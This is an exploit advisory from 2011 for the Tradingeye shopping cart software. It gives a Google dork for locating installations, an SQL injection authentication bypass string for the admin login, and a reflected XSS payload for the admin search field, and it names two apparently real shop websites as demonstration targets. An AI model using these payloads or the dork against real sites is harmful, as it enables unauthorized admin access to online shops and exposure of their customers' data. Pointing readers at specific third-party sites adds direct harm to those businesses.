By Pass Admin Tradingeye E-commerce Shopping Cart

# Exploit Title: Tradingeye Multiple Vulnerabilities

# Vendor:  www.tradingeye.com

# Date: 12th july,2011

# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (

http://www.shadowrootkit.wordpress.com)

# Google Dork:  Powered by Tradingeye. 2009 Tradingeye v6 demo

*****************************************************************************************************************************************************************************************

BREIF DESCRIPTION

*****************************

Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS,

built from the ground up with web accessibility and SEO in mind. Tradingeye

is the

choice of thousands of online retailers who care about accessibility,

usability and most importantly - results.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability

***************************************

{DEMO} : http://site.com/adminindex.php

EXPLOIT:

Username: ' or 0=0 #

Password: ' or 0=0 #

Observe: Attackers can use Authentication Bypass to get into Admin Panel in

the site.

demo:

http://www.aqueos.co.uk/adminindex.php

http://www.ginkofineart.com/admin/adminindex.php

Reflected XSS Vulnerability

********************************

EXPLOIT 2: Reflected XSS Vulnerability in admin panel(search field)

{Demo}:

http://site.com/user/adminindex.php?action=user.home

Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>